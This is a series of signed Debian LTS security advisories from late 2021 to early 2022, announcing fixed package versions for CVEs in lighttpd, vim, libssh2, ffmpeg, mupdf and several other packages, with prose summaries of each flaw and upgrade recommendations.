[SECURITY] [DLA 2879-1] lighttpd security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2879-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky January 14, 2022 https://wiki.debian.org/LTS - - Package: lighttpd Version: 1.4.45-1+deb9u1 CVE ID : CVE-2018-19052 One issue has been discovered in lighttpd: fast webserver with minimal memory footprint. CVE-2018-19052: an issue was discovered in mod_alias_physical_handler in mod_alias.c in lighttpd before 1.4.50. There is potential ../ path traversal of a single directory above an alias target, with a specific mod_alias configuration where the matched alias lacks a trailing '/' character, but the alias target filesystem path does have a trailing '/' character. For Debian 9 stretch, this problem has been fixed in version 1.4.45-1+deb9u1. We recommend that you upgrade your lighttpd packages. For the detailed security status of lighttpd please refer to its security tracker page at: https://security-tracker.debian.org/tracker/lighttpd Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmHm/wMACgkQ0+Fzg8+n /wbkGRAAkBPd/YM8g/PqpkgpXhomSOlP+2ydhJFg8bgpCuC6XGvZeHZtGKV5QcgJ cTPRC7fGqHZ2C617h6gsuSRcpZxz7xkzyM2uQtlXCxKP8NIg56K4lzJ+Z23JjGE7 /2Dg8/7QVQ+HeLT0fWyaOYhRVjVgdlUCLfby+Lf+icMzGZ8yysT2bnLNwFn0QFiv WG580M0JFo3y/gFaI7G5PCAh5Qr/7gr0kOotl9tv4GOz18KMiBhrGMjnzOCD3bYm Hi0bP9jBv4mdN45yEeysJLlItr34XOjU9Q++bs83OJ48JqBlNpvnGyQFPTZaFs2I 3VasogDKZt3uOXOdk3aO9mAea9QsI8CTVkSqvUhDKQqEXYBmnAHbjyN7NB540WRB 2d+YSCCTKMoybL7mSNTo9fZAsJEKqXtllnJ4W9I3zK0KQC7Ks8SEoGj30eZkQK56 BYvVCfHB3IMLqgEx7M0QU4DN3n7lm7drwhISba1Z+1Y9OtfQZ8aP3oKqGdDb00jE 9uD4D3mKVnrAuZ6DI6/n+VhXGNtNjWkOp8tXP9uuFyizYXGChbex4JoUPgglvNm+ JGh/kYfyql1v19Pl1bcYa8zH+Y9z5rnLEA/4SmVA/MnsehkD0ftQFaL5qQZiHspH v2uz8uJ5MTcrI4zl43bznQ5Zw9dqKyS+cVTrnVwtvUJ+3gN5sq0= =Ejs6 -END PGP SIGNATURE-
[SECURITY] [DLA 2876-1] vim security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2876-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky January 10, 2022 https://wiki.debian.org/LTS - - Package: vim Version: 2:8.0.0197-4+deb9u4 CVE ID : CVE-2017-17087 CVE-2019-20807 CVE-2021-3778 CVE-2021-3796 Multiple issues have been discovered in vim: an enhanced vi text editor: CVE-2017-17087 fileio.c in Vim sets the group ownership of a .swp file to the editor's primary group (which may be different from the group ownership of the original file), which allows local users to obtain sensitive information by leveraging an applicable group membership. CVE-2019-20807 Users can circumvent the rvim restricted mode and execute arbitrary OS commands via scripting interfaces (e.g., Python, Ruby, or Lua). CVE-2021-3778 Heap-based Buffer Overflow with invalid utf-8 character was detected in regexp_nfa.c. CVE-2021-3796 Heap Use-After-Free memory error was detected in normal.c. A successful exploitation may lead to code execution. For Debian 9 stretch, these problems have been fixed in version 2:8.0.0197-4+deb9u4. We recommend that you upgrade your vim packages. For the detailed security status of vim please refer to its security tracker page at: https://security-tracker.debian.org/tracker/vim Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmHcqhoACgkQ0+Fzg8+n /wZilQ//WDE93KpT0jg1kuiTgqhXjdfF+CZVH5NrBkp95OmxkPRe97fwNqgE5Ufd KqNx/3CV80fWIMtlGRgIK/nMQhiLvmbBlCmaG2UEdgz1SSd5ToU9GvcZXNOy13ps C8GyGJfuzTMiqME20GfUKm6lIeHkyPbpAAIX/eFI/H3crkyHFqSYFGW/yDYjPvVs 9sF53kYeB7l8gqlKE+2jGownyNZYqmmo3eWakkTl/uCRnedxUEOstUY2woqkQwNe H5i+Ug5KEPBo6hk5rOPGa196Oqg3nVF2ZOwCDFVC41ODlhespavZCzyZVTXeTRSV uT4hymineqiPfFSs1qdJwBj3SOkbw3y3ml2d0TX1nTF/YBShELBS1BoL/PR0lgXz I2v8CbLZLSU036+82lMeic8ayBcT+KS13dBPZWH+afikxdNTfh37+5hb5tci+PAc cHf/10RNxVEXfpY2HufTIPKmFtAdezkrIDMRiCj1+7oty2EYAI7lwEHcombj4WEu zlXxN6U58OkCx3PvgRLm2hE22KmIsvJ1hFYRPtizhi/BIxtSb1vF77PV+kB9LYjk E73Sgrfe6830CQGDxveEQ/rts5moA1ZMHX+tz58z9NkgLmDj/rrpLYclwbm9XaP+ /5rm/OGf/IBbn6w8L0SDfPgjUzi9BF2PPHxcXaQEptJtT0vkW/s= =9KDF -END PGP SIGNATURE-
[SECURITY] [DLA 2848-1] libssh2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2848-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky December 17, 2021 https://wiki.debian.org/LTS - - Package: libssh2 Version: 1.7.0-1+deb9u2 CVE ID : CVE-2019-13115 CVE-2019-17498 Two issues have been discovered in libssh2, a client-side C library implementing the SSH2 protocol: CVE-2019-13115: kex_method_diffie_hellman_group_exchange_sha256_key_exchange in kex.c has an integer overflow that could lead to an out-of-bounds read in the way packets are read from the server. A remote attacker who compromises a SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server. CVE-2019-17498: SSH_MSG_DISCONNECT logic in packet.c has an integer overflow in a bounds check, enabling an attacker to specify an arbitrary (out-of-bounds) offset for a subsequent memory read. A crafted SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server. For Debian 9 stretch, these problems have been fixed in version 1.7.0-1+deb9u2. We recommend that you upgrade your libssh2 packages. For the detailed security status of libssh2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/libssh2 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmG9FZcACgkQ0+Fzg8+n /wYcjA/8DbDlW35YAdfZnkIdylAZDlC0v/Ij5NaLcpJYUrL7OjFvPGJvh3koZz1f y2HM/U2VEGYoMLHKxDItEpSw9FkkS6NB2HoA8CM2+PAkzn6GAVlJ26Kh0SkrHZi1 djFlyC/FQDm07m7jTy9ntG7kioisjClGMrDQj+Zkb00TczKk4+q6uB92HpDj0/sG M25HwhVmUuFYnR6tS5gSeil/pcjmFD6486BHu+uAfqIQwMsyofWGTcT7iSTtIaLE 2LHWLy4AOZVsdbhEdcARv3TQccHkzR1yWkQ9aGIVNuxXu5jWCfnyEmxJjePyGe4q EDdrA1ml1nDfhzxbQevbGWsDUXPuYEYP0lMqu0QM/Z7D8lR0EoOheoS9zKkn+M5g BDAuRSrE1yB+1Cha5EoXtEeJ9abbW9E6UqqeMWLRkAjlGfsvQnOU5JlpZauPkjaW taz3gQ7ByrVPv9Z0kdp0KiwgaTiBErbaqxKB35/XILDAvu7H/tdOV5vx900uvUah 0XWU0Oyp7wRNU0cPzf0hYoqi5rwoB+zFSFj5VtGU8aRpEkmxpVVbUCPcqOnYE0Bg RaDS3euw1zvzzNp6TINZg2SrF4rF/KFbA5UpLiRq7D0W5jSgNVcnfTTCOtdWscrt 8kZB5JNyePyyRGNsq8A28mgcV+pFmfg1NDMmtAC7sy8rPvQTyww= =e/qE -END PGP SIGNATURE-
[SECURITY] [DLA 2839-1] gerbv security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2839-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky December 03, 2021 https://wiki.debian.org/LTS - - Package: gerbv Version: 2.6.1-2+deb9u1 CVE ID : CVE-2021-40391 One security issue has been discovered in gerbv: a viewer for Gerber RS-274X files. It was discovered that an out-of-bounds write vulnerability exists in the drill format T-code tool. A specially-crafted drill file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. For Debian 9 stretch, this problem has been fixed in version 2.6.1-2+deb9u1. We recommend that you upgrade your gerbv packages. For the detailed security status of gerbv please refer to its security tracker page at: https://security-tracker.debian.org/tracker/gerbv Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmGqc8UACgkQ0+Fzg8+n /wbnxw/7B7quJeb+LwelKTjalNxv3nxDFneqFU5aw9PETNLchppjaeaf4wtsRQGv fMipbBejrMS3gYXbQJka+n332Rw8NKh1hMDmXKExeSE+7zw8PmaBcmuhjbR7kv/5 dJauAyHRJH0c9vC6aPEro/28bUnrbn9TDEobVaKv++3rmPI37uRb0+dNRc9haUvp uyLUkzjE2JRCTFk454/G0iZf6sfAzRbpvHSz0u74JAhylceNlf215AFQJGjdsDj3 v9dH2qCEHeWkRpOrjEsxZ+uBjAH+CsuU+2GQNs00+mRWfMmL3V8zAmskjJbUu5zf BoGj6MYwsws0hxkKxB/62CqhVIf8BAjU7Gv9uhxnFaTRN/OkqzXcid4DT5kAH28w SeNrz64BvPppzGbISYOgnB/Koa4yT4Oi/YfsXZ2uBeDAKsULxxIrJRUu/OspGFn6 5V2fDl6t3HtwidBdsG36aT7wWxT+nterQP0WWLgOXHCH5T8F1SDts1i88cw9TPgZ REEmoi+hZagpblisYPzUz8KepY0PbO2NLUBdKcpHsVkjQTJuLiNpRQ8nf1XNnvxZ Qzwigkmg0BOIc2+G2qL4CEq85rgkoFmjXm7RoBVtB7WZhaDp2uS62uXk5NNv7JQ5 8lz5mXfXGHhA3uhW/O6sTA7SopvnBUVXyW9XhXqbzyT9wgrI04A= =bKJn -END PGP SIGNATURE-
[SECURITY] [DLA 2837-1] gmp security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2837-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky December 02, 2021 https://wiki.debian.org/LTS - - Package: gmp Version: 2:6.1.2+dfsg-1+deb9u1 CVE ID : CVE-2021-43618 Debian Bug : 994405 One security issue has been discovered in gmp: GNU Multiple Precision Arithmetic Library. It was discovered that integer overflow is possible in mpz/inp_raw.c and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms. For Debian 9 stretch, this problem has been fixed in version 2:6.1.2+dfsg-1+deb9u1. We recommend that you upgrade your gmp packages. For the detailed security status of gmp please refer to its security tracker page at: https://security-tracker.debian.org/tracker/gmp Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmGpJCkACgkQ0+Fzg8+n /wZlUBAAnuM5xs5sZQ1w5Wc2HXt2lPdIb/8ri2pUVEL8udLpvSiqrJlOqyBnY6R1 HKgcFOEVsajlMYJYFCSEjbN6qR9mZMxNFcI0XwC5kn0wFdLKD3FPS+jiOKDHBGF/ z1OhTJqFSCadQUGCrGQb/63M6dl8CKXy2MZNEdvkZiPsbIkYKfBAsq9gbxqcoWK6 jnOSgzbYmnU1aj6oH7QIrL2amPMx/ZcOx8v9tt6C1m2fCMEZM/yOT3mVSxaYwiAF odPSHGNVdgl2uWQwpW5uoP2csJ+RD6rXB86sct/cCjtRGLCRZYzJuy7sIeKzCbu4 bnc6NnOG8qbdVE4mNfUzh18UrOfoU12seeEY9O56w2n7OV+HVpqHnWFygizYoKjL d9L5cs9WRFlBxdQx9Ps5IBgP4fdwhU7QHSKeOIb3wnEVrahO3QCvGHKz8LK/rZep a4dN9Q6gpqvqzgAQh6zNShidIUTtSlfgSVdVPrSMVkMNKxS8B6WLNYculwBkqZdh QW4lc+NH3R9OJf1ecXGMc5GCFvIPHJxK+NXsoxbMcVCdiNsoYgVnPRUDlV4WrvZh C9GFJbXkS45GKBda17TaTKM+EBEFDoE5opmWl/xwNkJu8Wjv/aZBO3kflLn2Bl4x Uf4rQmMZWBqn4pjftlQz/jh44cxs66T5Fqahsp4WIp2cRw4Hlxw= =/0KZ -END PGP SIGNATURE-
[SECURITY] [DLA 2818-1] ffmpeg security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2818-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky November 13, 2021 https://wiki.debian.org/LTS - - Package: ffmpeg Version: 7:3.2.16-1+deb9u1 CVE ID : CVE-2020-20445 CVE-2020-20446 CVE-2020-20451 CVE-2020-20453 CVE-2020-22037 CVE-2020-22041 CVE-2020-22044 CVE-2020-22046 CVE-2020-22048 CVE-2020-22049 CVE-2020-22054 CVE-2021-38171 CVE-2021-38291 Multiple issues have been discovered in ffmpeg - tools for transcoding, streaming and playing of multimedia files. CVE-2020-20445 Divide By Zero issue via libavcodec/lpc.h, which allows a remote malicious user to cause a Denial of Service. CVE-2020-20446 Divide By Zero issue via libavcodec/aacpsy.c, which allows a remote malicious user to cause a Denial of Service. CVE-2020-20451 Denial of Service issue due to resource management errors via fftools/cmdutils.c. CVE-2020-20453 Divide By Zero issue via libavcodec/aaccoder, which allows a remote malicious user to cause a Denial of Service. CVE-2020-22037 A Denial of Service vulnerability due to a memory leak in avcodec_alloc_context3 at options.c CVE-2020-22041 A Denial of Service vulnerability due to a memory leak in the av_buffersrc_add_frame_flags function in buffersrc. CVE-2020-22044 A Denial of Service vulnerability due to a memory leak in the url_open_dyn_buf_internal function in libavformat/aviobuf.c. CVE-2020-22046 A Denial of Service vulnerability due to a memory leak in the avpriv_float_dsp_allocl function in libavutil/float_dsp.c. CVE-2020-22048 A Denial of Service vulnerability due to a memory leak in the ff_frame_pool_get function in framepool.c. CVE-2020-22049 A Denial of Service vulnerability due to a memory leak in the wtvfile_open_sector function in wtvdec.c. CVE-2020-22054 A Denial of Service vulnerability due to a memory leak in the av_dict_set function in dict.c. CVE-2021-38171 adts_decode_extradata in libavformat/adtsenc.c does not check the init_get_bits return value, which is a necessary step because the second argument to init_get_bits can be crafted. CVE-2021-38291 Assertion failure at src/libavutil/mathematics.c, causing ffmpeg aborted is detected. In some extrme cases, like with adpcm_ms samples with an extremely high channel count, get_audio_frame_duration() may return a negative frame duration value. For Debian 9 stretch, these problems have been fixed in version 7:3.2.16-1+deb9u1. We recommend that you upgrade your ffmpeg packages. For the detailed security status of ffmpeg please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ffmpeg Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmGRdfMACgkQ0+Fzg8+n /wYM1hAAlHzYwm9B2nvTdl09cQjxypZel3vsSLywadLMkwxz+nOkqT8eKK7NUCx+ DDuCEpNKx8NXudadNxp3RFgjkmC72cB9aFZsjaq2OoycCJhRK43hTWNt+4fEuSWZ AVThV5bC72usSf2bW56cHsiF1nIJqkPIlc9wpPBXPz+sVSoDrZAN7npzdMmrZbEi jakCPqUAtOfJXMlphT5rN91DVFvHbSeeSl4YSVk4/ne7vPv8exy2eQH1UfHOu7JY 7jzg15Y9H5eQILlVTyj5Kjqf8oC20toyMTFJLYTnBBlnRGjDa71RqBajWN3wfH2h HNrLrFuqpeR0L5Pp7BdybGETHTh4xdXthj6yWQr83rGJt6qSr4wbB7cYyhp/fPci +5k92Cr/4+GVtbZ5Mf3swqVuak6N+FHHhO3RmcNGxaGBf8FGo6R4appfbMITusow AdJWeGIwIU57jPkD3gVAuySWJGtm2jiqpHMpL7tF9t4ZX/tOE3Anzoxtql+qJhZH fU+GdJ6giWA80NnpicG44I6dh/yC8zL3B/nXRI/dBVVgmSEwL4ypFfj/C491nx2i FQ/suwiZLaSip8dDyjsb6kdvvoivRqMZhzmWlsp3cdvJluJdqSfMMG0sI9J7nxfk phWZs4mBriPSOu+zQoLr7uyqtL/sSHeQ0gINBAN9iO5sagG6aBk= =2qUQ -END PGP SIGNATURE-
[SECURITY] [DLA 2812-1] botan1.10 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2812-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky November 08, 2021 https://wiki.debian.org/LTS - - Package: botan1.10 Version: 1.10.17-1+deb9u1 CVE ID : CVE-2017-14737 One security issue has been discovered in botan1.10: a C++ cryptography library. An attacker of a local or a cross-VM may be able to recover bits of secret exponents as used in RSA, DH, etc. with help of cache analysis. https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/wang-shuai For Debian 9 stretch, this problem has been fixed in version 1.10.17-1+deb9u1. We recommend that you upgrade your botan1.10 packages. For the detailed security status of botan1.10 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/botan1.10 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmGJlfsACgkQ0+Fzg8+n /waTvxAAmViY/mHlK+e6Bs3JwfiFbtBixUxnfnaIF+byn7QGjoWCQhcKMP/QrPiO x4KU0S/88634P5t0Kd7VtGxAPKAuS9u4U2GzbED3LNqWkE6YIsK0TqJTXGDT/Q3o dEFWp7pHuG5nAP4pPJ9xTPXZfaF0gI+/HgetPUxB026qvhl/iaveEvzyyH94Yc9J 0lZSEnyC3tymRM9/8RlvthQIVDiZENMZHvTH7Alyn+yu3VEGkRCWlY+mfPSqSHUS Qa0XNAzNEQXeYKY/1OUmNbxjHX8scy9H2rlchs/+G63lgY6oS29ZKCf2ON36gCes /zVWzPCAhy1iIr6QPDSx8zpkHp4Y4t7da98WUTW72hsrHEVGKZXI1IwD52QbQxUq y76k4fiKIcP0TcoRVyXjCFW/+0fgEI+hMHiA0tM8iuas4wTBYD9D+iuRijaBYWKB /cO73DpBvurXmLZNFBfN0PxIY8paw3ru1pZE9VA8dixauE3jIYTcwDIj5hEvkrG9 2u9qQBNnm06C9eXuu9F1jBI3HNgZX9cRyJL8/ig3J8rbBq9OrI2z2ssztXf+3Gp5 HZL5aqp0PoRxmnUasgOucbrgJEcz7W15F6mceRy6PoSeknX7xZVvB+CR0qGxBtH7 MI6NBxhB3dQUsry6gUlerBJYY6Yd+oSZk2+Ujb+8936adhW8y+E= =xXmx -END PGP SIGNATURE-
[SECURITY] [DLA 2793-1] mosquitto security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2793-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky October 26, 2021 https://wiki.debian.org/LTS - - Package: mosquitto Version: 1.4.10-3+deb9u5 CVE ID : CVE-2017-7655 One security issue has been discovered in mosquitto: MQTT message broker. A null dereference vulnerability was found which could lead to crashes for applications using the library. For Debian 9 stretch, this problem has been fixed in version 1.4.10-3+deb9u5. We recommend that you upgrade your mosquitto packages. For the detailed security status of mosquitto please refer to its security tracker page at: https://security-tracker.debian.org/tracker/mosquitto Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmF5aQ0ACgkQ0+Fzg8+n /waN+g//Z2jk48y0pwfTnN3jQFosyBb6Aci8fw3LwvCwRr6UXaWc+16vgmtUD2dW BW9Oj3cSjCHbR+IuXM7NWwxehfrtVrFDVblJJp3wB+LmGAv6WqC7T0YD9dOMCjgL Q5pwdaPeBcfUMvQTO2drjP+z1Qcmx+h4ZI1c5FR00uUiITeTcrm2wBhkW0b1CZoo exifPUrsdGDkDRj0A5FEpAIUPBJW05vyyLVq+vozOhyf+DPRpte7gMADhGCzB0au R3JYLjlCGrZjWaQgC4mNfq9WHXIOKPeGr9w227xyZbc5HCun96epySaCzNQj+/jL /rfI0SaPugyI3pEQ3xoSlv+dZVRQzfP7MthzNVks0bzgpJVTa0AVCSL5o2pkQtlB 6jz9+0x/Zlmv/ISTH3pyZ3MLHU8oj9iBgbuvXbpZwQho2e2qmv3OTSUKc4O7eLfi Onz77ZJg2mCXEXz9PVirJAX212r7exYNwGs94GLptFGishUgiGt+Wrpe9hetCunx MJbZsIfE1n3X4nxeIyN/mgyjTRfWR9P8eYxFKJZfx3NrXx2HLLNqQ+Ye6Ufft9WW hi3PK9pff46w86aw+jR4934Ai83055J9Jq5fG26D5LOj/366bojnxW8AbEAXEOQ5 owJqqcMyOIx822u5K+ZRrAXxVF+7ts06B4TXNMD2YOB9oJDkpiw= =Irwz -END PGP SIGNATURE-
[SECURITY] [DLA 2786-1] nghttp2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2786-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky October 16, 2021 https://wiki.debian.org/LTS - - Package: nghttp2 Version: 1.18.1-1+deb9u2 CVE ID : CVE-2018-1000168 CVE-2020-11080 Two security issue have been discovered in nghttp2: server, proxy and client implementing HTTP/2. CVE-2018-1000168 An Improper Input Validation CWE-20 vulnerability found in ALTSVC frame handling that can result in segmentation fault leading to denial of service. This attack appears to be exploitable via network client. CVE-2020-11080 The overly large HTTP/2 SETTINGS frame payload causes denial of service. The proof of concept attack involves a malicious client constructing a SETTINGS frame with a length of 14,400 bytes (2400 individual settings entries) over and over again. The attack causes the CPU to spike at 100%. For Debian 9 stretch, these problems have been fixed in version 1.18.1-1+deb9u2. We recommend that you upgrade your nghttp2 packages. For the detailed security status of nghttp2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/nghttp2 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmFrvI8ACgkQ0+Fzg8+n /wakFA//cHXBrc2jiJ6comMoArM7BnSE0/DxbrY5FsdoN1NWEbTKcsK+cDuW9bBk roCrah3Nwzw3lnjlsWiR0PVqklyYWEBYdq6TEs1h+cp8XIpxFGuRQcbieZFqrGXB 09H4yFBlbpgeu3KyHtLfuuqJSklJg4GVvI4iCd4+ruu1avYnSk5HFtji9SLjx9vX zcM66+yll1ZKD64C2wAwzSeYvDntU5DGO3rwQ6LC2R8SDka7tudh5YBqP+I7tZeQ aNqYJ0WctVdPoEe2IHZMAYZQsfKU2OkJW9E/fHK/E3ghDAscDYWWGOyEn4o0sp3c FzHkzXLq+KRSD62EFBu5KKCZQ9wlfQ6ckGf6kuWRQIJnpAAgPRYsor3h8vDvEm9B CHidp75FAPkX2vCbFzTlIKl5NDr9ilZlT6mHzZKtfbFNn300a6wTFOqrWwah2xyE 7VY1YX3v8jRMYoY6V4K62f0PMKmj00vt/huscugH6sur21VF/8DXWY/oPMAPbuj7 B0V5IAf3xLWNivD+cML3zPTwE5LBnIf/SCenijPLpwolf0tGhtKtDEsfj8yZTXsZ U4VDksNKNckLgy/bWl4pRPb/wGxax4e/DgUCWRljjGxIPrfuoY6Wtr9q29ONEoMp 82QMVZAUemFkCJ6eGqs2s+oaCII4/R86L00yPBljMbPf32YDaf4= =vAXg -END PGP SIGNATURE-
[SECURITY] [DLA 2775-1] plib security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2775-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky October 02, 2021 https://wiki.debian.org/LTS - - Package: plib Version: 1.8.5-7+deb9u1 CVE ID : CVE-2021-38714 One security issue has been discovered in plib. Integer overflow vulnerability that could result in arbitrary code execution. The vulnerability is found in ssgLoadTGA() function in src/ssg/ssgLoadTGA.cxx file. For Debian 9 stretch, this problem has been fixed in version 1.8.5-7+deb9u1. We recommend that you upgrade your plib packages. For the detailed security status of plib please refer to its security tracker page at: https://security-tracker.debian.org/tracker/plib Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmFYRlsACgkQ0+Fzg8+n /wYIyA/9FFgE9gBXVTL5zEDZObe9wyZPxiXlDO+mF6MYpY7qgg4Z/6C/mkZrceE4 pBN1mpSAJ11Udxvyhoy4bB2Kqy73jB2E8xh6NCbIqYlmVi03NFXPJ13lKnNCsNON rPAzoySkz/cPLKgTgStKdCfbrxche+TV8QTIs8LrPw2vmqVtAAUbUuNyxmYVpQad WnzoLWDmjL5OmblFZFTrLSCzVg6mRcMYgX4hhOee+1Jiw8dKvaDSWHw4k1yNbtef ZlaB4+jjCNa8WAr1ksh/hfqrikdH9EGgCn7Pp/hDnUaBzcHDpjGLTrcdRVJZWaJm zKuYmAvr84V7tefjekPwzhjy7FwyzRGzSKfECVPX5TPgqIQEAvVBIF40SD0ZxPaT nJJORy0CeAVFx96eO8wAGZQCeoW+39RF2MDdw6Y77QiXMGGbEBWsYwZ37POpBdDT 5MRI7A+eEVVd6NRkpIFVjETZ/kaqfpX91iRwgcnfs7kZY+ky9BrS0W2HA77vR/Bp kSKkacWmbkU3QIN43jXZ/dU7PIFJ2HfJUnGmyDmekS5RqvSbkYBTKXZhW6c826JW WOHHnQgrFgho2c3yByOAh3dT9mH4+hujQco/6S4494TDJZEnqNrE6CgtCIPSURor ZGu7wqjVMvISyfpU0Eicy88gK7ljEnpcEERn/ne2cvmPOV6VZy4= =A2pl -END PGP SIGNATURE-
[SECURITY] [DLA 2765-1] mupdf security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2765-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky September 23, 2021https://wiki.debian.org/LTS - - Package: mupdf Version: 1.14.0+ds1-4+deb9u1 CVE ID : CVE-2016-10246 CVE-2016-10247 CVE-2017-6060 CVE-2018-10289 CVE-2018-136 CVE-2020-19609 Multiple issues have been discovered in mupdf. CVE-2016-10246 Buffer overflow in the main function in jstest_main.c allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted file. CVE-2016-10247 Buffer overflow in the my_getline function in jstest_main.c allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted file. CVE-2017-6060 Stack-based buffer overflow in jstest_main.c allows remote attackers to have unspecified impact via a crafted image. CVE-2018-10289 An infinite loop in the fz_skip_space function of the pdf/pdf-xref.c file. A remote adversary could leverage this vulnerability to cause a denial of service via a crafted pdf file. CVE-2018-136 Multiple memory leaks in the PDF parser allow an attacker to cause a denial of service (memory leak) via a crafted file. CVE-2020-19609 A heap based buffer over-write in tiff_expand_colormap() function when parsing TIFF files allowing attackers to cause a denial of service. For Debian 9 stretch, these problems have been fixed in version 1.14.0+ds1-4+deb9u1. We recommend that you upgrade your mupdf packages. For the detailed security status of mupdf please refer to its security tracker page at: https://security-tracker.debian.org/tracker/mupdf Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmFM5qcACgkQ0+Fzg8+n /wZ+2w/+KMtJDPzaGgHYzhaeax75+IXBf9zfbS+AO/trnFuj8Jh7bNql5REN+7Bf sT6R/8U74AMKmZrTrurq1Exp5KpNxxlPCOJvl8RgrSzC+0hmzIy/+MeIi+Q/TaiW j1b6HpqILbWz2NmzM0cYcDXYFRt9voOwKDwehmz2Vr/Zm9elX+VPzlm77mcGJy0H f0eC81vizuI1s+DPa1Psd0USzBjfcLgUaIN+e4/aGOSMUX6EwYzvX8DjIYGO1PeV L8ye3XybwL734IUmgU7MSKdZi/qJ9pYeIuyq48mvNNlEZXu0pEmiJBepwKnIvtLi eKMimFLs6Hth2+jKoSJn3evk/Wd6JT8/HK8aMlsEsad2NVrw/ovy07I09DfXIW8F iphBKPJHQezLmDzCsrzutjDVmOrEs06IygD1wglsCxKDCXrT0lPQzbyiuHhDbbCv +KStwXAmp+Q2sgsWqYU+/N4/60mGrgNNtFiLBFqtrb1mQzY+P867Vofg1KNjJ39L egQhyJjnTE09PNXYA8S+Ev3CbgvWBaPX5n8uROpMaFhXR2g9t5Q6+sVEt+5oJ13f DpLqPDWDUNlrqe3+MVyDUMkZ+Xoonl40Yxn3c+x3WuCiiiSJ2liJY4T/QLlpUqg3 MLQoQn+1C1tvc+peLGNh5Bgemr1qoz9wT0fI0CtUmJcmUAZQhMI= =4y6v -END PGP SIGNATURE-
[SECURITY] [DLA 2758-1] sssd security update
